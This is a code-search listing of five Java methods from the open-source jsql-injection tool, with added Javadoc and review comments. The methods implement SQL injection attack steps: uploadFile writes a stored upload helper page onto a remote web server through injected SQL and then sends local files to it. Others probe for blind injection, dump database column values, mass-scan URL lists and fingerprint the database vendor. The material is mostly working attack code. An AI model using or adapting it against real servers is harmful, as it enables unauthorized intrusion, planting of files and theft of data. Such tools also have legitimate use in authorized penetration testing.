use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class ResourceAccess method uploadFile.
/**
 * Writes the upload helper page to the remote server through the injection, verifies it
 * by reading it back, then sends the local file to that helper over HTTP.
 *
 * <p>Nothing is done when {@code isReadingAllowed()} returns false. The helper source is
 * taken from the base64 encoded {@code shell.upload} property, wrapped between the
 * {@code DataAccess.LEAD} and {@code DataAccess.TRAIL} markers and written to
 * {@code pathFile} followed by {@code filenameUpload}. The HTTP upload is only attempted
 * when the content read back contains the helper source.
 *
 * <p>Review note: the whole sequence depends on the injected query being able to create
 * a file under {@code pathFile} and on that location being served at {@code urlFile}.
 * Presumably a database account without file-write rights, or a web root the database
 * process cannot write to, makes the read-back check fail; confirm against the
 * vendor-specific SQL, which is not visible here.
 *
 * @param pathFile remote directory receiving the helper page; a trailing slash is added when missing
 * @param urlFile base URL under which that directory is served; when empty it is derived
 *                from the connection base URL, cut after its last slash
 * @param file local file to send
 * @throws JSqlException when the read-back is empty, fails, or does not contain the helper
 *                       source (error built by {@code getIntegrityError})
 * @throws IOException when the local file cannot be opened; may also come from the HTTP
 *                     upload, which is not visible here
 * @throws InterruptedException presumably raised by the HTTP upload; confirm against {@code upload}
 */
public void uploadFile(String pathFile, String urlFile, File file) throws JSqlException, IOException, InterruptedException {
    if (!this.isReadingAllowed()) {
        return;
    }

    // The helper is stored base64 encoded; its placeholder marker is swapped for the real lead marker
    String helperSource = StringUtil
        .base64Decode(
            this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload")
        )
        .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD);

    // Remote directory always ends with a slash so the file name can be appended directly
    final String remoteDir = pathFile.matches(".*/$") ? pathFile : pathFile + "/";

    String wrappedHelper = "<" + DataAccess.LEAD + ">" + helperSource + "<" + DataAccess.TRAIL + ">";
    this.injectionModel.injectWithoutIndex(
        this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile(
            wrappedHelper,
            remoteDir + this.filenameUpload
        ),
        "upload"
    );

    // Single-slot holder handed to the reader and reused to build the integrity error
    var pageHolder = new String[] { StringUtils.EMPTY };
    String readBack;
    try {
        readBack = new SuspendableGetRows(this.injectionModel).run(
            this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(remoteDir + this.filenameUpload),
            pageHolder,
            false,
            1,
            null,
            "upload"
        );
        if (StringUtils.isEmpty(readBack)) {
            // Caught by the handler just below, so callers only ever see the integrity error
            throw new JSqlException("Bad payload integrity: Empty payload");
        }
    } catch (JSqlException e) {
        throw this.getIntegrityError(pageHolder);
    }

    // Fall back to the connection base URL, kept up to and including its last slash
    final String baseUrl = StringUtils.isEmpty(urlFile)
        ? this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(
            0,
            this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf('/') + 1
        )
        : urlFile;

    // The file read back must contain exactly what was written, otherwise nothing is uploaded
    if (!readBack.contains(helperSource)) {
        throw this.getIntegrityError(pageHolder);
    }

    LOGGER.log(
        LogLevel.CONSOLE_SUCCESS,
        "Upload payload deployed at '{}{}' in '{}{}'",
        () -> baseUrl,
        () -> this.filenameUpload,
        () -> remoteDir,
        () -> this.filenameUpload
    );

    try (InputStream localContent = new FileInputStream(file)) {
        // NOTE(review): a derived baseUrl already ends with '/', so this URL then holds a double slash
        HttpResponse<String> response = this.upload(file, baseUrl + "/" + this.filenameUpload, localContent);
        this.confirmUpload(file, remoteDir, baseUrl, response);
    }

    // Tell the views the upload sequence is over
    var endUpload = new Request();
    endUpload.setMessage(Interaction.END_UPLOAD);
    this.injectionModel.sendToViews(endUpload);
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class StrategyInjectionBlind method checkApplicability.
/**
 * Checks whether the boolean-based blind strategy can be used, trying the AND mode
 * first and the OR mode only when AND is not injectable.
 *
 * <p>When the current vendor exposes no boolean blind expression the method only logs
 * that fact and leaves the strategy state untouched. Otherwise the outcome is stored in
 * {@code isApplicable}, the strategy is allowed or unallowed accordingly, and on success
 * the views receive a {@code MESSAGE_BINARY} request carrying the info message of the
 * blind injection.
 *
 * @throws StoppedByUserSlidingException presumably raised by the blind probe when the
 *         user stops the process; the raising code is not visible here
 */
@Override
public void checkApplicability() throws StoppedByUserSlidingException {
    // No vendor-specific boolean expression means nothing to test
    if (StringUtils.isEmpty(this.injectionModel.getMediatorVendor().getVendor().instance().sqlBooleanBlind())) {
        LOGGER.log(LogLevel.CONSOLE_INFORM, "No Blind strategy known for {}", this.injectionModel.getMediatorVendor().getVendor());
        return;
    }

    LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with AND...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
    this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.AND);
    this.isApplicable = this.injectionBlind.isInjectable();

    if (this.isApplicable) {
        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with AND", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
    } else {
        // AND failed: the OR probe replaces the stored blind injection, whatever its result
        LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with OR...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
        this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.OR);
        this.isApplicable = this.injectionBlind.isInjectable();
        if (this.isApplicable) {
            LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with OR", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
        }
    }

    if (!this.isApplicable) {
        this.unallow();
        return;
    }

    this.allow();

    // Forward the info message of the successful probe to the views
    var binaryMessage = new Request();
    binaryMessage.setMessage(Interaction.MESSAGE_BINARY);
    binaryMessage.setParameters(this.injectionBlind.getInfoMessage());
    this.injectionModel.sendToViews(binaryMessage);
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class DataAccess method listValues.
/**
 * Reads the values of the selected columns, with the occurrence count of each value,
 * and sends them to the views.
 *
 * <p>Values are in clear text (not hexadecimal) and follow the window pattern
 * {@code hh[value 1]jj[count]hhgghh[value 2]jj[count]hhggh...hi}. The data window can be
 * cut before the end of the request; the process then fetches the rest of the data that
 * was out of reach. The user can interrupt the process (stop/pause).
 *
 * <p>The views receive {@code START_PROGRESS}, then {@code CREATE_VALUES_TAB} with the
 * column titles, the values and the table, then {@code END_PROGRESS}.
 *
 * @param columns columns chosen by the user; the table and database are taken from the
 *                first one, so the list must not be empty
 * @return a two-dimensional array containing the values by column
 * @throws JSqlException when the injection fails or is stopped by the user
 */
public String[][] listValues(List<Column> columns) throws JSqlException {
    // Table and database are resolved from the first column only;
    // presumably every column belongs to the same table, confirm with callers
    var firstColumn = columns.get(0);
    var database = (Database) firstColumn.getParent().getParent();
    var table = (Table) firstColumn.getParent();
    int rowCount = firstColumn.getParent().getChildCount();

    // Inform the view that the table has just been used
    var startProgress = new Request();
    startProgress.setMessage(Interaction.START_PROGRESS);
    startProgress.setParameters(table);
    this.injectionModel.sendToViews(startProgress);

    // Collect the column names as text
    List<String> titles = new ArrayList<>();
    columns.forEach(column -> titles.add(column.toString()));

    // The plain names are handed over; per the original note they become SQL fields
    // of the form trim(ifnull(`col1`,0x00)),0x7f,trim(ifnull(`Col2`,0x00))...
    List<List<String>> rows = this.getRows(database, table, rowCount, titles.toArray(new String[0]));

    // Two empty leading titles stand for the default columns: row number, occurrence
    titles.addAll(0, List.of(StringUtils.EMPTY, StringUtils.EMPTY));

    String[][] tableDatas = this.build2D(titles, rows);
    String[] titlesWithDefaults = titles.toArray(new String[0]);

    // Column titles, values and the Table object travel together in one array
    var valuesTab = new Request();
    valuesTab.setMessage(Interaction.CREATE_VALUES_TAB);
    valuesTab.setParameters(new Object[] { titlesWithDefaults, tableDatas, table });
    this.injectionModel.sendToViews(valuesTab);

    var endProgress = new Request();
    endProgress.setMessage(Interaction.END_PROGRESS);
    endProgress.setParameters(table);
    this.injectionModel.sendToViews(endProgress);

    return tableDatas;
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class ManagerScan method scan.
/**
 * Runs a fast scan of the given URLs one after the other and displays the result.
 *
 * <p>The current view is unsubscribed and replaced by a console-like subscriber, so that
 * GUI messages produce simple text output instead of complex graphical components while
 * several sites are processed. The normal view is subscribed again when the scan ends.
 * The loop stops early when the model is stopped by the user or the scan is flagged as
 * stopped; both flags are cleared at the end.
 *
 * @param urlsItemList items to scan; each element is cast to {@code ItemListScan}
 */
public void scan(List<ItemList> urlsItemList) {
    // Fixed half-second pause. An interrupt is logged and the flag restored, but the scan
    // itself keeps going: only the stop flags checked in the loop end it.
    Runnable pause = () -> {
        try {
            Thread.sleep(500);
        } catch (InterruptedException e) {
            LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
            Thread.currentThread().interrupt();
        }
    };

    // Erase everything in the view from a previous injection
    var resetInterface = new Request();
    resetInterface.setMessage(Interaction.RESET_INTERFACE);
    MediatorHelper.model().sendToViews(resetInterface);

    // Wait for the ongoing interaction between two injections to end
    pause.run();

    // Display results only in the console
    var unsubscribe = new Request();
    unsubscribe.setMessage(Interaction.UNSUBSCRIBE);
    MediatorHelper.model().sendToViews(unsubscribe);
    MediatorHelper.model().subscribe(new ScanListTerminal());

    MediatorHelper.model().setIsScanning(true);
    MediatorHelper.model().getResourceAccess().setScanStopped(false);

    for (ItemList item : urlsItemList) {
        var scanItem = (ItemListScan) item;

        boolean isStopRequested = MediatorHelper.model().isStoppedByUser()
            || MediatorHelper.model().getResourceAccess().isScanStopped();
        if (isStopRequested) {
            break;
        }

        var target = scanItem.getBeanInjection();
        LOGGER.log(LogLevel.CONSOLE_INFORM, "Scanning {}", target.getUrl());
        MediatorHelper.model().getMediatorUtils().getParameterUtil().controlInput(
            target.getUrl(),
            target.getRequest(),
            target.getHeader(),
            target.getMethodInstance(),
            target.getRequestType(),
            true
        );

        pause.run();
    }

    // Get back the normal view; the same unsubscribe request is sent a second time
    MediatorHelper.model().sendToViews(unsubscribe);
    MediatorHelper.model().subscribe(MediatorHelper.frame().getSubscriber());

    MediatorHelper.model().setIsScanning(false);
    MediatorHelper.model().setIsStoppedByUser(false);
    MediatorHelper.model().getResourceAccess().setScanStopped(false);

    var endScan = new Request();
    endScan.setMessage(Interaction.END_SCAN);
    MediatorHelper.model().sendToViews(endScan);
}
use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.
the class MediatorVendor method fingerprintVendor.
/**
 * Determines the database vendor and sends it to the views with a {@code SET_VENDOR} request.
 *
 * <p>A vendor selected by the user, other than the auto entry, is used as is. In auto
 * mode a fixed test string is injected and the returned page is matched against the
 * error regex of every known vendor except auto; the first match wins and the result is
 * passed through {@code initializeVendor}.
 *
 * <p>Review note: this basic step only has something to match when database error text
 * reaches the response page, so responses that do not echo database errors give it no
 * signal. What {@code initializeVendor} does when nothing matched is not visible here.
 *
 * @return the vendor forced by the user, or in auto mode the value returned by
 *         {@code initializeVendor}
 */
public Vendor fingerprintVendor() {
    Vendor vendorFound = null;

    if (this.injectionModel.getMediatorVendor().getVendorByUser() == this.injectionModel.getMediatorVendor().getAuto()) {
        LOGGER.log(LogLevel.CONSOLE_DEFAULT, "Fingerprinting database...");

        // NOTE(review): the page is dereferenced below without a null check;
        // confirm injectWithoutIndex never returns null
        String pageSource = this.injectionModel.injectWithoutIndex("'\"#-)'\"*", "test#vendor");

        var mediatorVendor = this.injectionModel.getMediatorVendor();
        Vendor[] candidates = mediatorVendor
            .getVendors()
            .stream()
            .filter(v -> v != mediatorVendor.getAuto())
            .toArray(Vendor[]::new);

        // First vendor whose error regex matches the whole page, case-insensitive and dot-all
        for (Vendor candidate : candidates) {
            if (pageSource.matches("(?si)" + candidate.instance().fingerprintErrorsAsRegex())) {
                vendorFound = candidate;
                LOGGER.log(
                    LogLevel.CONSOLE_SUCCESS,
                    MediatorVendor.LOG_VENDOR,
                    () -> "Basic fingerprint matching vendor",
                    () -> candidate
                );
                break;
            }
        }

        vendorFound = this.initializeVendor(vendorFound);
    } else {
        // The user's explicit choice bypasses fingerprinting and initializeVendor
        vendorFound = this.injectionModel.getMediatorVendor().getVendorByUser();
        LOGGER.log(
            LogLevel.CONSOLE_INFORM,
            MediatorVendor.LOG_VENDOR,
            () -> I18nUtil.valueByKey("LOG_DATABASE_TYPE_FORCED_BY_USER"),
            () -> this.injectionModel.getMediatorVendor().getVendorByUser()
        );
    }

    var setVendor = new Request();
    setVendor.setMessage(Interaction.SET_VENDOR);
    setVendor.setParameters(vendorFound);
    this.injectionModel.sendToViews(setVendor);

    return vendorFound;
}